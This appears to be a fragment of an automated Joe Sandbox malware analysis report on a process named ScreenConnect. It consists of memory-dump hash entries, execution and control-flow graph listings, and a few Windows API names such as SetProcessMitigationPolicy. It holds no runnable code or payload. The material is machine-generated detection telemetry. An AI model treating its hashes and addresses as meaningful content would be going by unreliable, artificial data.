                                                                  • Instruction Fuzzy Hash: 38E0C215BDD61781FABC3165B6B13B960C09F06312F05007AD60EC20C1CC6DEC80A192
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c1deea4aa9f8de82832d53f4c236742d51851ae760cdc772af07cfcf36964cf4
                                                                  • Instruction ID: a8f2ba86138c55ea7f25b6047519abef8a536317191b427365e12f079ce6a1d1
                                                                  • Opcode Fuzzy Hash: c1deea4aa9f8de82832d53f4c236742d51851ae760cdc772af07cfcf36964cf4
                                                                  • Instruction Fuzzy Hash: D7D0A730705D094F974DA73D88B883036D0FB6B20578900B5E40AC71B1FE08DCC8C785
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8696a235d424c294ac52c14df9aa03c7c8595125297949df766821935c993b7b
                                                                  • Instruction ID: 8726947d750d3070875b28935d1f83f66bb42380f8076d7e9965a8eecc92460c
                                                                  • Opcode Fuzzy Hash: 8696a235d424c294ac52c14df9aa03c7c8595125297949df766821935c993b7b
                                                                  • Instruction Fuzzy Hash: E8C02263F0D80A0EE254850C28900745B80D7650A0B282223C81CD3162EC036C419384
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 521eaacd46f4b106dc90674bd5a828638cec91646bcb05f138df010ea396776a
                                                                  • Instruction ID: 4773083d50bc6febea5f13c8bba14666df428327e22013bf54a137680f4f45e1
                                                                  • Opcode Fuzzy Hash: 521eaacd46f4b106dc90674bd5a828638cec91646bcb05f138df010ea396776a
                                                                  • Instruction Fuzzy Hash: A7D0C920F2D1064ADA24EB289CD56E431A0AB4A324F822135E508C2284EBAC90A4A749
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 542fdfa523083665308c38bb9de065c85d30e60df9a5d69575153f6d66b4c763
                                                                  • Instruction ID: 7b893ad80cde982bb8f39eaeec5c32fe335dda30a6592e9a818adddf0962ecb4
                                                                  • Opcode Fuzzy Hash: 542fdfa523083665308c38bb9de065c85d30e60df9a5d69575153f6d66b4c763
                                                                  • Instruction Fuzzy Hash: 59C02B02B08C8605E7C8542C08B40B800C5CBE36447C4037768AFC10D3CD4CDC42B304
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3466013811.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd343c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aca951691f2bd1aed6c972f640400c37e13c402c7f38df67b5f636146d89849d
                                                                  • Instruction ID: e12939634d6a313a86c5637bb05049d7652b96543b1a2762af9ae7671bebe478
                                                                  • Opcode Fuzzy Hash: aca951691f2bd1aed6c972f640400c37e13c402c7f38df67b5f636146d89849d
                                                                  • Instruction Fuzzy Hash: 8EC09B20F0C51646F545F72544E55BD11427FC9304F508830D10DC62D6CD7CE5127505
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3466013811.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd343c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b923a1ad2ad8f3e1426a82747e1a32b68f6db9d48bbb7562110033e22e61a9c9
                                                                  • Instruction ID: 6a451ea59cf28f3fd1e31ad792de136087d3310694dddc98411b3eb75fdb3a25
                                                                  • Opcode Fuzzy Hash: b923a1ad2ad8f3e1426a82747e1a32b68f6db9d48bbb7562110033e22e61a9c9
                                                                  • Instruction Fuzzy Hash: D4A00210F4CA2646A851711801A19BE00410F56600E218531D30DC21EACD6CE952724B

                                                                  Execution Graph

                                                                  Execution Coverage:11.9%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:10
                                                                  Total number of Limit Nodes:2
                                                                  execution_graph 15860 7ffd343c8ffc 15864 7ffd343c900f 15860->15864 15861 7ffd343c9169 GlobalMemoryStatusEx 15862 7ffd343c9195 15861->15862 15863 7ffd343c90c8 15864->15861 15864->15863 15855 7ffd340b7fc4 15856 7ffd340b7fcd 15855->15856 15857 7ffd340b8032 15856->15857 15858 7ffd340b80a6 SetProcessMitigationPolicy 15856->15858 15859 7ffd340b8102 15858->15859

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 730 7ffd343c8ffc-7ffd343c903a 733 7ffd343c903c-7ffd343c9065 730->733 734 7ffd343c9084-7ffd343c9097 730->734 735 7ffd343c9067-7ffd343c906a 733->735 736 7ffd343c90be 733->736 741 7ffd343c9099-7ffd343c909d 734->741 742 7ffd343c9108-7ffd343c9112 734->742 738 7ffd343c90eb-7ffd343c90ef 735->738 739 7ffd343c906c-7ffd343c906e 735->739 740 7ffd343c90bf 736->740 768 7ffd343c90f0 738->768 744 7ffd343c90ea 739->744 745 7ffd343c9070 739->745 746 7ffd343c913b-7ffd343c913d 740->746 747 7ffd343c90c0 740->747 748 7ffd343c911e-7ffd343c911f 741->748 749 7ffd343c909e 741->749 752 7ffd343c9113-7ffd343c911c 742->752 744->738 755 7ffd343c9072-7ffd343c9074 745->755 756 7ffd343c90b3 745->756 758 7ffd343c9141-7ffd343c9167 746->758 747->758 759 7ffd343c90c1 747->759 753 7ffd343c9169-7ffd343c9193 GlobalMemoryStatusEx 748->753 754 7ffd343c9120-7ffd343c9121 748->754 750 7ffd343c909f 749->750 751 7ffd343c90a0-7ffd343c90a1 749->751 750->751 764 7ffd343c90a2 751->764 765 7ffd343c911d 751->765 752->765 760 7ffd343c919b-7ffd343c91c2 753->760 761 7ffd343c9195 753->761 766 7ffd343c9123-7ffd343c9128 754->766 767 7ffd343c9076 755->767 755->768 769 7ffd343c90b5 756->769 770 7ffd343c912f-7ffd343c9133 756->770 758->753 762 7ffd343c90c2-7ffd343c90c6 759->762 763 7ffd343c9103-7ffd343c9107 759->763 761->760 762->749 772 7ffd343c90c8-7ffd343c90e9 762->772 763->742 764->752 773 7ffd343c90a3-7ffd343c90a7 764->773 765->748 774 7ffd343c9129-7ffd343c912e 766->774 775 7ffd343c90b9 767->775 776 7ffd343c9078-7ffd343c907a 767->776 777 7ffd343c90b6-7ffd343c90b7 769->777 778 7ffd343c90f7-7ffd343c90f9 769->778 779 7ffd343c9135-7ffd343c913a 770->779 772->744 773->766 780 7ffd343c90a9 773->780 774->770 775->779 783 7ffd343c90bb-7ffd343c90bd 775->783 781 7ffd343c907c 776->781 782 7ffd343c90f6 776->782 777->775 784 7ffd343c90fb-7ffd343c90fe 778->784 785 7ffd343c90ff 778->785 779->746 780->738 787 7ffd343c90ab-7ffd343c90ad 780->787 781->740 788 7ffd343c907e-7ffd343c9082 781->788 782->778 783->736 784->785 789 7ffd343c9101 785->789 790 7ffd343c9102 785->790 787->774 791 7ffd343c90af-7ffd343c90b1 787->791 788->734 788->740 789->790 790->763 791->756
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2628958018.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd343c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5adcdb624b28425349caa70fd6cc6b3505c1f908f099dfd470d34d02a7e2ac2a
                                                                  • Instruction ID: 735da814215882405ff212b888a644fd83175f7da286bae2aea07d854b209dcf
                                                                  • Opcode Fuzzy Hash: 5adcdb624b28425349caa70fd6cc6b3505c1f908f099dfd470d34d02a7e2ac2a
                                                                  • Instruction Fuzzy Hash: F5715831A4C6894FE765E768496A6B93FE0EF53310F0501BAD25CC7593DE7C6C0A8B41

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2624229052.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffd340b0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: MitigationPolicyProcess
                                                                  • String ID:
                                                                  • API String ID: 1088084561-0
                                                                  • Opcode ID: 61085551914cfa53de2bbdfa5c9cb0872e0e6e0cb7e249ab94a8920d360e9134
                                                                  • Instruction ID: f0daeebdb0e2d08ef0d0e5571896295fe3c2b4fdb1644cb324c69b654489f803
                                                                  • Opcode Fuzzy Hash: 61085551914cfa53de2bbdfa5c9cb0872e0e6e0cb7e249ab94a8920d360e9134
                                                                  • Instruction Fuzzy Hash: 7F514931E0CB494FD725ABA89C4A5F97BF0EF56311F04017FE089C3292DE68A8468796